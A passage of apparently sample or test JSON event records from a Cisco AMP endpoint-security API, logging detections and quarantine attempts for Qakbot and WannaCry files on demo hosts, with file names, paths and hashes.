Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":779000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":763000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":718000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":765000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":749000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":702000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336648","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":713000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":713000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6412622782676336645","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":713000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6412622782676336644","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336648","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"el2j9fcqj.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\el2j9fcqj.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336645","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"120C.tmp","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\120C.tmp","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 